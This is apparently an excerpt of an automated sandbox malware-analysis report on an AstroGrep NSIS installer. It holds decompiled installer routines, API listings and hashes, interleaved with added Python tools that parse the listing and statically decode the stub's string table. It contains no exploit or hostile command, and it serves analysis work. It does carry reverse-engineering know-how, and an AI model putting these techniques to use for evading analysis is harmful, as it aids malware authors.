                                                                                                            								if(_t89 != 0) {
                                                                                                            									 *_t89 =  *_t89 & 0x00000000;
                                                                                                            								}
                                                                                                            								if(GetDiskFreeSpaceA(0x428838,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
                                                                                                            									goto L35;
                                                                                                            								} else {
                                                                                                            									_t168 = 0x400;
                                                                                                            									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
                                                                                                            									asm("cdq");
                                                                                                            									_v48.LowPart = _t109;
                                                                                                            									_v44 = _t156;
                                                                                                            									_v12 = 1;
                                                                                                            									goto L36;
                                                                                                            								}
                                                                                                            							} else {
                                                                                                            								_t159 = 0;
                                                                                                            								if(0 == 0x428838) {
                                                                                                            									goto L30;
                                                                                                            								} else {
                                                                                                            									goto L26;
                                                                                                            								}
                                                                                                            								while(1) {
                                                                                                            									L26:
                                                                                                            									_t114 = GetDiskFreeSpaceExA(0x428838,  &_v48,  &_v28,  &_v40);
                                                                                                            									if(_t114 != 0) {
                                                                                                            										break;
                                                                                                            									}
                                                                                                            									if(_t159 != 0) {
                                                                                                            										 *_t159 =  *_t159 & _t114;
                                                                                                            									}
                                                                                                            									_t160 = E004057E8(0x428838);
                                                                                                            									 *_t160 =  *_t160 & 0x00000000;
                                                                                                            									_t159 = _t160 - 1;
                                                                                                            									 *_t159 = 0x5c;
                                                                                                            									if(_t159 != 0x428838) {
                                                                                                            										continue;
                                                                                                            									} else {
                                                                                                            										goto L30;
                                                                                                            									}
                                                                                                            								}
                                                                                                            								_t150 = _v44;
                                                                                                            								_v48.LowPart = (_t150 << 0x00000020 | _v48.LowPart) >> 0xa;
                                                                                                            								_v44 = _t150 >> 0xa;
                                                                                                            								_v12 = 1;
                                                                                                            								_t158 = 0;
                                                                                                            								__eflags = 0;
                                                                                                            								L35:
                                                                                                            								_t168 = 0x400;
                                                                                                            								L36:
                                                                                                            								_t95 = E004047E6(5);
                                                                                                            								if(_v12 != _t158) {
                                                                                                            									_t197 = _v44;
                                                                                                            									if(_t197 <= 0 && (_t197 < 0 || _v48.LowPart < _t95)) {
                                                                                                            										_v8 = 2;
                                                                                                            									}
                                                                                                            								}
                                                                                                            								_t147 =  *0x42dbdc; // 0x6fdecd
                                                                                                            								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
                                                                                                            									E004047CE(0x3ff, 0xfffffffb, _t95);
                                                                                                            									if(_v12 == _t158) {
                                                                                                            										SetDlgItemTextA(_a4, _t168, 0x428828);
                                                                                                            									} else {
                                                                                                            										E00404709(_t168, 0xfffffffc, _v48.LowPart, _v44); // executed
                                                                                                            									}
                                                                                                            								}
                                                                                                            								_t96 = _v8;
                                                                                                            								 *0x42e4a4 = _t96;
                                                                                                            								if(_t96 == _t158) {
                                                                                                            									_v8 = E0040140B(7);
                                                                                                            								}
                                                                                                            								if(( *(_v32 + 0x14) & _t168) != 0) {
                                                                                                            									_v8 = _t158;
                                                                                                            								}
                                                                                                            								E00403F36(0 | _v8 == _t158);
                                                                                                            								if(_v8 == _t158) {
                                                                                                            									_t205 =  *0x429858 - _t158; // 0x0
                                                                                                            									if(_t205 == 0) {
                                                                                                            										E004042E7();
                                                                                                            									}
                                                                                                            								}
                                                                                                            								 *0x429858 = _t158;
                                                                                                            								goto L53;
                                                                                                            							}
                                                                                                            						}
                                                                                                            						_t185 = _a8 - 0x405;
                                                                                                            						if(_a8 != 0x405) {
                                                                                                            							goto L53;
                                                                                                            						}
                                                                                                            						goto L22;
                                                                                                            					}
                                                                                                            					_t118 = _a12 & 0x0000ffff;
                                                                                                            					if(_t118 != 0x3fb) {
                                                                                                            						L12:
                                                                                                            						if(_t118 == 0x3e9) {
                                                                                                            							_t152 = 7;
                                                                                                            							memset( &_v76, 0, _t152 << 2);
                                                                                                            							_v80 = _t166;
                                                                                                            							_v72 = 0x429868;
                                                                                                            							_v60 = E004046A3;
                                                                                                            							_v56 = _t146;
                                                                                                            							_v68 = E00405D51(_t146, 0x429868, _t166, 0x428c40, _v12);
                                                                                                            							_t122 =  &_v80;
                                                                                                            							_v64 = 0x41;
                                                                                                            							__imp__SHBrowseForFolderA(_t122);
                                                                                                            							if(_t122 == 0) {
                                                                                                            								_a8 = 0x40f;
                                                                                                            							} else {
                                                                                                            								__imp__CoTaskMemFree(_t122);
                                                                                                            								E004057A1(_t146);
                                                                                                            								_t125 =  *((intOrPtr*)( *0x42e410 + 0x11c));
                                                                                                            								if( *((intOrPtr*)( *0x42e410 + 0x11c)) != 0 && _t146 == "C:\\Program Files (x86)\\AstroGrep") {
                                                                                                            									E00405D51(_t146, 0x429868, _t166, 0, _t125);
                                                                                                            									if(lstrcmpiA(0x42d3a0, 0x429868) != 0) {
                                                                                                            										lstrcatA(_t146, 0x42d3a0);
                                                                                                            									}
                                                                                                            								}
                                                                                                            								 *0x429858 =  *0x429858 + 1;
                                                                                                            								SetDlgItemTextA(_t166, 0x3fb, _t146);
                                                                                                            							}
                                                                                                            						}
                                                                                                            						goto L20;
                                                                                                            					}
                                                                                                            					if(_a12 >> 0x10 != 0x300) {
                                                                                                            						goto L53;
                                                                                                            					} else {
                                                                                                            						_a8 = 0x40f;
                                                                                                            						goto L12;
                                                                                                            					}
                                                                                                            				} else {
                                                                                                            					_t165 = GetDlgItem(_t166, 0x3fb);
                                                                                                            					if(E0040580E(_t146) != 0 && E0040583A(_t146) == 0) {
                                                                                                            						E004057A1(_t146);
                                                                                                            					}
                                                                                                            					 *0x42dbd8 = _t166; // executed
                                                                                                            					SetWindowTextA(_t165, _t146); // executed
                                                                                                            					_push( *((intOrPtr*)(_a16 + 0x34)));
                                                                                                            					_push(1);
                                                                                                            					E00403F14(_t166);
                                                                                                            					_push( *((intOrPtr*)(_a16 + 0x30)));
                                                                                                            					_push(0x14);
                                                                                                            					E00403F14(_t166);
                                                                                                            					E00403F49(_t165);
                                                                                                            					if(E004060C8(6) == 0) {
                                                                                                            						L53:
                                                                                                            						return E00403F7B(_a8, _a12, _a16);
                                                                                                            					} else {
                                                                                                            						SHAutoComplete(_t165, 1); // executed
                                                                                                            						goto L8;
                                                                                                            					}
                                                                                                            				}
			}

[Address column for the C code above: 0x00404352 .. 0x004046A0 (unresolved entries 0x00000000)]

                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32 ref: 004043A1
                                                                                                            • SetWindowTextA.USER32(00000000,?), ref: 004043CB
                                                                                                            • SHAutoComplete.SHLWAPI(00000000,00000001,00000006,00000000,?,00000014,?,?,00000001,?), ref: 00404405
                                                                                                            • SHBrowseForFolderA.SHELL32(?,00428C40,?), ref: 0040447C
                                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 00404487
                                                                                                            • lstrcmpiA.KERNEL32(Remove folder: ,AstroGrep v4.4.7 Setup ,00000000,?,?), ref: 004044B9
                                                                                                            • lstrcatA.KERNEL32(?,Remove folder: ), ref: 004044C5
                                                                                                            • SetDlgItemTextA.USER32 ref: 004044D7
                                                                                                              • Part of subcall function 00405509: GetDlgItemTextA.USER32 ref: 0040551C
                                                                                                              • Part of subcall function 00405F9A: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE" ,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00405FF2
                                                                                                              • Part of subcall function 00405F9A: CharNextA.USER32(?,?,?,00000000), ref: 00405FFF
                                                                                                              • Part of subcall function 00405F9A: CharNextA.USER32(?,"C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE" ,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00406004
                                                                                                              • Part of subcall function 00405F9A: CharPrevA.USER32(?,?,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00406014
                                                                                                            • GetDiskFreeSpaceExA.KERNELBASE(C:\Program Files (x86)\,?,?,?,00000001,C:\Program Files (x86)\,?,?,000003FB,?), ref: 0040454E
                                                                                                            • GetDiskFreeSpaceA.KERNEL32(C:\Program Files (x86)\,?,?,0000040F,?,C:\Program Files (x86)\,C:\Program Files (x86)\,?,00000001,C:\Program Files (x86)\,?,?,000003FB,?), ref: 00404595
                                                                                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004045B0
                                                                                                              • Part of subcall function 00404709: lstrlenA.KERNEL32(AstroGrep v4.4.7 Setup ,AstroGrep v4.4.7 Setup ,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404624,000000DF,00000000,00000400,?), ref: 004047A7
                                                                                                              • Part of subcall function 00404709: wsprintfA.USER32 ref: 004047AF
                                                                                                              • Part of subcall function 00404709: SetDlgItemTextA.USER32 ref: 004047C2
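The APIs listing above is what a reviewer works from when a report like this has to be compared against other samples or against a clean build of the same installer: SHBrowseForFolderA, GetDiskFreeSpaceExA and MulDiv(?, 0x40F, 0x400) followed by SetDlgItemTextA with "Remove folder:" is a directory-selection dialog computing free disk space, i.e. installer UI, and the recovered strings belong to the setup executable run as process 5 (the ASTROGREP_SETUP_V4.4.7.EXE path in the CharNextA arguments), not to the behaviour the report's verdict rests on. The following is an added example, not part of the report and not code from the sample or its author: a small parser for that listing that extracts module, API, arguments, call-site address and the module-relative offset, and recovers the string arguments the sandbox resolved. It assumes only the line shape visible above (`• Api.MODULE(args), ref: ADDRESS`, with `Part of subcall function ADDRESS:` on the indented lines) and the image base printed in the Memory Dump Source line (Offset: 00400000). The sample input is a constructed excerpt of the lines above; arguments are split on commas because that is the report's own delimiter, so a string argument that itself contains a comma would be split.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Constructed sample input: "APIs" lines copied in the shape this report prints them.
# A hand-made excerpt for the example, not report output fetched at run time.
SAMPLE_API_LISTING = r"""
• GetDlgItem.USER32 ref: 004043A1
• SetWindowTextA.USER32(00000000,?), ref: 004043CB
• SHAutoComplete.SHLWAPI(00000000,00000001,00000006,00000000,?,00000014,?,?,00000001,?), ref: 00404405
• SHBrowseForFolderA.SHELL32(?,00428C40,?), ref: 0040447C
• CoTaskMemFree.OLE32(00000000), ref: 00404487
• lstrcmpiA.KERNEL32(Remove folder: ,AstroGrep v4.4.7 Setup ,00000000,?,?), ref: 004044B9
  • Part of subcall function 00405509: GetDlgItemTextA.USER32 ref: 0040551C
• GetDiskFreeSpaceExA.KERNELBASE(C:\Program Files (x86)\,?,?,?,00000001,C:\Program Files (x86)\,?,?,000003FB,?), ref: 0040454E
• MulDiv.KERNEL32(?,0000040F,00000400), ref: 004045B0
"""

# Image base taken from the "Memory Dump Source" line of the same function (Offset: 00400000).
IMAGE_BASE = 0x00400000

# One report line: optional subcall prefix, Api.MODULE, optional (args), then ", ref: ADDRESS".
API_LINE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<subcall>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
HEX_ARG = re.compile(r"^[0-9A-Fa-f]{8}$")


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: Tuple[str, ...]
    ref: int                       # virtual address of the call site as printed in the report
    subcall: Optional[int] = None  # callee address when the line is marked "Part of subcall function"

    def rva(self, image_base: int = IMAGE_BASE) -> int:
        """Module-relative offset of the call site, for looking it up in a disassembler."""
        return self.ref - image_base

    def literal_args(self) -> List[str]:
        """Arguments the sandbox resolved to text rather than an 8-digit hex value or '?'."""
        return [a for a in self.args if a and a != "?" and not HEX_ARG.match(a)]


def parse_listing(text: str) -> List[ApiCall]:
    """Parse every API line in the listing; lines of any other shape (headings etc.) are skipped."""
    calls: List[ApiCall] = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw_args = m.group("args")
        args = tuple(a.strip() for a in raw_args.split(",")) if raw_args is not None else ()
        sub = m.group("subcall")
        calls.append(ApiCall(
            api=m.group("api"),
            module=m.group("module"),
            args=args,
            ref=int(m.group("ref"), 16),
            subcall=int(sub, 16) if sub else None,
        ))
    return calls


def by_module(calls: List[ApiCall]) -> Dict[str, List[str]]:
    """APIs touched by the function, grouped by module and sorted, for diffing against another sample."""
    groups: Dict[str, set] = {}
    for c in calls:
        groups.setdefault(c.module, set()).add(c.api)
    return {mod: sorted(apis) for mod, apis in sorted(groups.items())}


def recovered_strings(calls: List[ApiCall]) -> List[str]:
    """Distinct string arguments in first-seen order (the call-argument part of the report's String ID line)."""
    seen: List[str] = []
    for c in calls:
        for s in c.literal_args():
            if s not in seen:
                seen.append(s)
    return seen


if __name__ == "__main__":
    parsed = parse_listing(SAMPLE_API_LISTING)
    for c in parsed:
        note = f" (subcall 0x{c.subcall:08X})" if c.subcall else ""
        print(f"{c.module:<10} {c.api:<20} rva=0x{c.rva():06X}{note}")
    print(by_module(parsed))
    print(recovered_strings(parsed))
```

Running the block prints each call with its RVA relative to 0x00400000, the per-module API set, and the three strings the arguments carry; the RVA is what you need to jump to the call site in a disassembler loaded from the same dump, and the per-module set is the compact shape to compare against the same function in another build.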
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: CharItemText$FreeNext$DiskSpace$AutoBrowseCompleteFolderPrevTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                            • String ID: A$AstroGrep v4.4.7 Setup $C:\Program Files (x86)\$C:\Program Files (x86)\AstroGrep$Remove folder:
                                                                                                            • API String ID: 4039761011-522898372
                                                                                                            • Opcode ID: 51479397fbbd838061552f249f671c3551ae327016cead83452ae8504ab1da61
                                                                                                            • Instruction ID: ab5132907fc5b2f665edfad9f17b3ca32a66d27d09768481e079f0ca797b6646
                                                                                                            • Opcode Fuzzy Hash: 51479397fbbd838061552f249f671c3551ae327016cead83452ae8504ab1da61
                                                                                                            • Instruction Fuzzy Hash: 07A194B1900209ABDB11AFA2CC45AAF77B8EF85314F10843BF601B62D1D77C8941CB69
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

C-Code - Quality: 74%

// Encoded-string expansion routine. It walks a string from the string table
// (base pointer at *0x42e438), copies literal bytes and expands four control
// codes: 1 = language string, 2 = shell folder, 3 = user variable (each with a
// two-byte 7-bit payload), 4 = escape (copy the next byte verbatim). The
// constant set (0x400 output bound, CSIDL pair per shell code, Quick Launch
// suffix for 0x1a, index 0x1d = parent window handle, path validation for
// indexes 21..27) matches the NSIS installer stub's GetNSISString().
E00405D51(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
	signed int _v8;
	struct _ITEMIDLIST* _v12;
	signed int _v16;
	signed char _v20;
	signed int _v24;
	signed char _v28;
	signed int _t37;
	CHAR* _t38;
	signed int _t40;
	int _t41;
	char _t51;
	char _t52;
	char _t54;
	char _t56;
	void* _t64;
	signed int _t70;
	signed int _t75;
	signed int _t76;
	intOrPtr _t80;
	char _t82;
	void* _t86;
	CHAR* _t87;
	void* _t89;
	signed int _t96;
	signed int _t98;
	void* _t99;

	_t89 = __esi;
	_t86 = __edi;
	_t64 = __ebx;
	_t37 = _a8;
	if(_t37 < 0) {
		// negative string index: resolve through the language table
		_t80 =  *0x42dbdc; // 0x6fdecd
		_t37 =  *(_t80 - 4 + _t37 * 4);
	}
	_push(_t64);
	_t75 =  *0x42e438 + _t37; // string table base + index = input pointer
	_t38 = 0x42d3a0;
	_push(_t89);
	_push(_t86);
	_t87 = 0x42d3a0; // default output: the 0x800-byte temp buffer
	if(_a4 >= 0x42d3a0 && _a4 - 0x42d3a0 < 0x800) {
		// caller's buffer already lies inside the temp area: write there directly
		_t87 = _a4;
		_a4 = _a4 & 0x00000000;
	}
	while(1) {
		_t82 =  *_t75;
		if(_t82 == 0) { // NUL terminator
			break;
		}
		__eflags = _t87 - _t38 - 0x400;
		if(_t87 - _t38 >= 0x400) { // output bound: 0x400 bytes
			break;
		}
		_t75 = _t75 + 1;
		__eflags = _t82 - 4;
		_a8 = _t75;
		if(__eflags >= 0) {
			if(__eflags != 0) {
				// byte > 4: literal character
				 *_t87 = _t82;
				_t87 =  &(_t87[1]);
				__eflags = _t87;
			} else {
				// byte == 4: escape, copy the following byte verbatim
				 *_t87 =  *_t75;
				_t87 =  &(_t87[1]);
				_t75 = _t75 + 1;
			}
			continue;
		}
		// bytes 1..3: control code with a two-byte payload (two 7-bit halves = 14-bit value)
		_t40 =  *(_t75 + 1);
		_t76 =  *_t75;
		_t96 = (_t40 & 0x0000007f) << 0x00000007 | _t76 & 0x0000007f;
		_a8 = _a8 + 2;
		_v28 = _t76 | 0x00000080;
		_t70 = _t76;
		_v24 = _t70;
		__eflags = _t82 - 2;
		_v20 = _t40 | 0x00000080;
		_v16 = _t40;
		if(_t82 != 2) {
			__eflags = _t82 - 3;
			if(_t82 != 3) {
				__eflags = _t82 - 1;
				if(_t82 == 1) {
					// code 1: language string, recurse with index -(value + 1)
					__eflags = (_t40 | 0xffffffff) - _t96;
					E00405D51(_t70, _t87, _t96, _t87, (_t40 | 0xffffffff) - _t96);
				}
				L42:
				// advance the output pointer past whatever the expansion wrote
				_t41 = lstrlenA(_t87);
				_t75 = _a8;
				_t87 =  &(_t87[_t41]);
				_t38 = 0x42d3a0;
				continue;
			}
			// code 3: user variable; index 0x1d is the parent window handle (*0x42e408)
			// rendered as a number, all others are 0x400-byte slots starting at 0x42f000
			__eflags = _t96 - 0x1d;
			if(_t96 != 0x1d) {
				__eflags = (_t96 << 0xa) + 0x42f000;
				E00405D2F(_t87, (_t96 << 0xa) + 0x42f000);
			} else {
				E00405C8D(_t87,  *0x42e408);
			}
			// indexes 21..27 hold paths: run them through the filename validator
			__eflags = _t96 + 0xffffffeb - 7;
			if(_t96 + 0xffffffeb < 7) {
				L33:
				E00405F9A(_t87);
			}
			goto L42;
		}
		// code 2: shell folder; first payload byte = current-user CSIDL, second = all-users CSIDL
		_t98 = 2;
		_t51 = GetVersion();
		__eflags = _t51;
		if(_t51 >= 0) {
			L13:
			// _v8 != 0: use the SHGetFolderPathA-style pointer at *0x42e404 before the CSIDL fallback
			_v8 = 1;
			L14:
			__eflags =  *0x42e484;
			if( *0x42e484 != 0) {
				_t98 = 4; // all-users flag set: try four CSIDL candidates instead of two
			}
			__eflags = _t70;
			if(_t70 >= 0) {
				// bit 7 clear: ordinary CSIDL; 0x24 = CSIDL_WINDOWS, 0x25 = CSIDL_SYSTEM
				__eflags = _t70 - 0x25;
				if(_t70 != 0x25) {
					__eflags = _t70 - 0x24;
					if(_t70 == 0x24) {
						GetWindowsDirectoryA(_t87, 0x400);
						_t98 = 0;
					}
					while(1) {
						__eflags = _t98;
						if(_t98 == 0) {
							goto L30;
						}
						_t52 =  *0x42e404;
						_t98 = _t98 - 1;
						__eflags = _t52;
						if(_t52 == 0) {
							L26:
							_t54 = SHGetSpecialFolderLocation( *0x42e408,  *(_t99 + _t98 * 4 - 0x18),  &_v12);
							__eflags = _t54;
							if(_t54 != 0) {
								L28:
								 *_t87 =  *_t87 & 0x00000000;
								__eflags =  *_t87;
								continue;
							}
							__imp__SHGetPathFromIDListA(_v12, _t87);
							__imp__CoTaskMemFree(_v12);
							__eflags = _t54;
							if(_t54 != 0) {
								goto L30;
							}
							goto L28;
						}
						__eflags = _v8;
						if(_v8 == 0) {
							goto L26;
						}
						_t56 =  *_t52( *0x42e408,  *(_t99 + _t98 * 4 - 0x18), 0, 0, _t87);
						__eflags = _t56;
						if(_t56 == 0) {
							goto L30;
						}
						goto L26;
					}
					goto L30;
				}
				GetSystemDirectoryA(_t87, 0x400);
				goto L30;
			} else {
				// bit 7 set: registry-backed folder. Value name = raw string-table entry at
				// offset (byte & 0x3f), read under HKLM\Software\Microsoft\Windows\CurrentVersion
				// (0x80000002 = HKEY_LOCAL_MACHINE); bit 6 (0x40) is passed through as the
				// view flag. An empty result falls back to the string at index _v16.
				_t73 = (_t70 & 0x0000003f) +  *0x42e438;
				E00405C16(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t70 & 0x0000003f) +  *0x42e438, _t87, _t70 & 0x00000040); // executed
				__eflags =  *_t87;
				if( *_t87 != 0) {
					L31:
					// second payload byte 0x1a (CSIDL_APPDATA): append the Quick Launch suffix
					__eflags = _v16 - 0x1a;
					if(_v16 == 0x1a) {
						lstrcatA(_t87, "\\Microsoft\\Internet Explorer\\Quick Launch");
					}
					goto L33;
				}
				E00405D51(_t73, _t87, _t98, _t87, _v16);
				L30:
				__eflags =  *_t87;
				if( *_t87 == 0) {
					goto L33;
				}
				goto L31;
			}
		}
		// GetVersion() high bit set (Win9x family): only use the *0x42e404 pointer for
		// version 0x5a04 or for CSIDL 0x23 / 0x2e (COMMON_APPDATA / COMMON_DOCUMENTS)
		__eflags = _t51 - 0x5a04;
		if(_t51 == 0x5a04) {
			goto L13;
		}
		__eflags = _v16 - 0x23;
		if(_v16 == 0x23) {
			goto L13;
		}
		__eflags = _v16 - 0x2e;
		if(_v16 == 0x2e) {
			goto L13;
		} else {
			_v8 = _v8 & 0x00000000;
			goto L14;
		}
	}
	// NUL-terminate; if the caller's buffer was outside the temp area, copy the result to it
	 *_t87 =  *_t87 & 0x00000000;
	if(_a4 == 0) {
		return _t38;
	}
	return E00405D2F(_a4, _t38);
}
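As an added worked example (the editor's code, not code from the report or from the sample), the following Python decoder implements the same expansion logic the decompiled routine performs, so an analyst can expand strings from an installer stub's string table statically instead of running it. Run-time lookups (SHGetSpecialFolderLocation, the HKLM registry read, variable slots) are rendered as symbolic markers. The string table, its offsets and the NSIS 2.x variable names used here are constructed assumptions, not values recovered from ms.bin; the routine itself only fixes index 29 as the parent window handle and 21..27 as path-validated.

```python
"""Decoder for the control-code string format expanded by the routine at
0x00405d51.  Added example (editor's code); lookups the stub does at run time
are rendered symbolically."""

NS_LANG_CODE, NS_SHELL_CODE, NS_VAR_CODE, NS_SKIP_CODE = 1, 2, 3, 4
NSIS_MAX_STRLEN = 0x400          # the 0x400 output bound checked in the loop
CSIDL_WINDOWS, CSIDL_SYSTEM, CSIDL_APPDATA = 0x24, 0x25, 0x1A   # shlobj.h
QUICKLAUNCH_SUFFIX = "\\Microsoft\\Internet Explorer\\Quick Launch"
HKLM_CURVER = "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion"

# NSIS 2.x variable numbering: assumption taken from the NSIS sources, only
# index 29 and the range 21..27 are corroborated by the decompiled routine.
VAR_NAMES = {20: "$CMDLINE", 21: "$INSTDIR", 22: "$OUTDIR", 23: "$EXEDIR",
             24: "$LANGUAGE", 25: "$TEMP", 26: "$PLUGINSDIR", 27: "$EXEPATH",
             28: "$EXEFILE", 29: "$HWNDPARENT"}


def code_short(n: int) -> bytes:
    """Pack a 14-bit index the way the stub reads it (7 bits per byte, bit 7
    set), so neither byte can be 0 (string end) or a control code 1..4."""
    assert 0 <= n < 0x4000
    return bytes([(n & 0x7F) | 0x80, ((n >> 7) & 0x7F) | 0x80])


def var_name(n: int) -> str:
    if n < 10:
        return f"${n}"
    if n < 20:
        return f"$R{n - 10}"
    return VAR_NAMES.get(n, f"$__{n}")


def raw_cstring(table: bytes, offset: int) -> str:
    """NUL-terminated entry at a string-table offset, without expansion."""
    return table[offset:table.index(b"\0", offset)].decode("latin-1")


def shell_folder(table: bytes, lo: int, hi: int, depth: int) -> str:
    """Shell-folder code: lo = current-user CSIDL, hi = all-users CSIDL.  Bit 7
    of lo switches to a registry read whose value name is the raw entry at
    table offset (lo & 0x3f); bit 6 selects the alternate registry view; hi is
    then the fallback string-table index expanded on an empty result."""
    if lo & 0x80:
        value = raw_cstring(table, lo & 0x3F)
        view = "64-bit view" if lo & 0x40 else "native view"
        fallback = decode_nsis_string(table, hi, depth + 1)
        return f"<{HKLM_CURVER}\\{value} ({view}), default {fallback}>"
    if lo == CSIDL_WINDOWS:
        name = "<WINDIR>"            # GetWindowsDirectoryA in the routine
    elif lo == CSIDL_SYSTEM:
        name = "<SYSDIR>"            # GetSystemDirectoryA in the routine
    else:
        name = f"<CSIDL {lo:#04x}|{hi:#04x}>"
    if hi == CSIDL_APPDATA:          # $QUICKLAUNCH encodes APPDATA in both bytes
        name += QUICKLAUNCH_SUFFIX
    return name


def decode_nsis_string(table: bytes, offset: int, depth: int = 0) -> str:
    """Expand the string at `offset`; raises on a truncated payload or on a
    crafted table whose registry fallback points back at itself."""
    if depth > 8:
        raise ValueError("fallback/lang-string recursion too deep")
    out, i, n_out = [], offset, 0
    while i < len(table) and table[i] != 0 and n_out < NSIS_MAX_STRLEN:
        c = table[i]
        i += 1
        if c > NS_SKIP_CODE:                  # ordinary character
            piece = chr(c)
        else:
            need = 1 if c == NS_SKIP_CODE else 2
            if i + need > len(table):
                raise ValueError("truncated control-code payload")
            if c == NS_SKIP_CODE:             # escape: next byte verbatim
                piece = chr(table[i])
            else:
                lo, hi = table[i], table[i + 1]
                n = ((hi & 0x7F) << 7) | (lo & 0x7F)
                if c == NS_LANG_CODE:         # resolved via the language table at run time
                    piece = f"$(LangString{n})"
                elif c == NS_SHELL_CODE:
                    piece = shell_folder(table, lo, hi, depth)
                else:                         # NS_VAR_CODE; 21..27 are path-validated
                    piece = var_name(n)
            i += need
        out.append(piece)
        n_out += len(piece)                   # approximates the 0x400 bound
    return "".join(out)


# Constructed string table (not from the sample).  "ProgramFilesDir" sits near
# the start because the registry form has only 6 bits for its offset.
TABLE = (
    b"\0"                                             # 0
    + b"ProgramFilesDir\0"                            # 1
    + b"C:\\Program Files\0"                          # 17
    + b"\x03" + code_short(21) + b"\\update.exe\0"    # 34: $INSTDIR\update.exe
    + b"\x02\x1a\x1a" + b"\\x.lnk\0"                  # 49: $QUICKLAUNCH\x.lnk
    + b"\x02\x81\x11" + b"\\a.exe\0"                  # 59: $PROGRAMFILES\a.exe
    + b"ab\x04\x03cd\0"                               # 69: escape, yields "ab\x03cd"
)
# Registry fallback at offset 17 that points back at itself.
LOOP_TABLE = b"\0" + b"ProgramFilesDir\0" + b"\x02\x81\x11\0"

if __name__ == "__main__":
    for off in (34, 49, 59, 69):
        print(off, repr(decode_nsis_string(TABLE, off)))
```

Pointed at a real string table (the block the stub addresses through *0x42e438), the decoder yields the installer's paths with $INSTDIR / registry markers left in place, which is enough to read drop locations and command lines out of a stub without executing it; the depth guard matters because a hand-built table can make the registry fallback recurse.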
Instruction addresses listed in the report's side column for the decompiled lines above (one per line, truncated in the extracted page): 0x00405d51 0x00405d51 0x00405d51 0x00405d57 0x00405d5c 0x00405d5e 0x00405d6d 0x00405d6d 0x00405d75 0x00405d76 0x00405d78 0x00405d80 0x00405d81 0x00405d82 0x00405d84 0x00405d9b 0x00405d9e 0x00405d9e 0x00405f77 0x00405f77 0x00405f7b 0x00000000 0x00000000 0x00405dab 0x00405db1 0x00000000 0x00000000 0x00405db7 0x00405db8 0x00405dbb 0x00405dbe 0x00405f6a 0x00405f74 0x00405f76 0x00405f76 0x00405f6c 0x00405f6e 0x00405f70 0x00405f71 0x00405f71 0x00000000 0x00405f6a 0x00405dc4 0x00405dc8 0x00405dd8 0x00405ddc 0x00405de3 0x00405de6 0x00405dea 0x00405df0 0x00405df3 0x00405df6 0x00405df9 0x00405f14 0x00405f17 0x00405f47 0x00405f4a 0x00405f4f 0x00405f53 0x00405f53 0x00405f58 0x00405f59 0x00405f5e 0x00405f61 0x00405f63 0x00000000 0x00405f63 0x00405f19
                                                                                                            0x00405f1c
                                                                                                            0x00405f31
                                                                                                            0x00405f38
                                                                                                            0x00405f1e
                                                                                                            0x00405f25
                                                                                                            0x00405f25
                                                                                                            0x00405f40
                                                                                                            0x00405f43
                                                                                                            0x00405f0c
                                                                                                            0x00405f0d
                                                                                                            0x00405f0d
                                                                                                            0x00000000
                                                                                                            0x00405f43
                                                                                                            0x00405e01
                                                                                                            0x00405e02
                                                                                                            0x00405e08
                                                                                                            0x00405e0a
                                                                                                            0x00405e24
                                                                                                            0x00405e24
                                                                                                            0x00405e2b
                                                                                                            0x00405e2b
                                                                                                            0x00405e32
                                                                                                            0x00405e36
                                                                                                            0x00405e36
                                                                                                            0x00405e37
                                                                                                            0x00405e39
                                                                                                            0x00405e72
                                                                                                            0x00405e75
                                                                                                            0x00405e85
                                                                                                            0x00405e88
                                                                                                            0x00405e90
                                                                                                            0x00405e96
                                                                                                            0x00405e96
                                                                                                            0x00405ef2
                                                                                                            0x00405ef2
                                                                                                            0x00405ef4
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00405e9a
                                                                                                            0x00405ea1
                                                                                                            0x00405ea2
                                                                                                            0x00405ea4
                                                                                                            0x00405ebe
                                                                                                            0x00405ecc
                                                                                                            0x00405ed2
                                                                                                            0x00405ed4
                                                                                                            0x00405eef
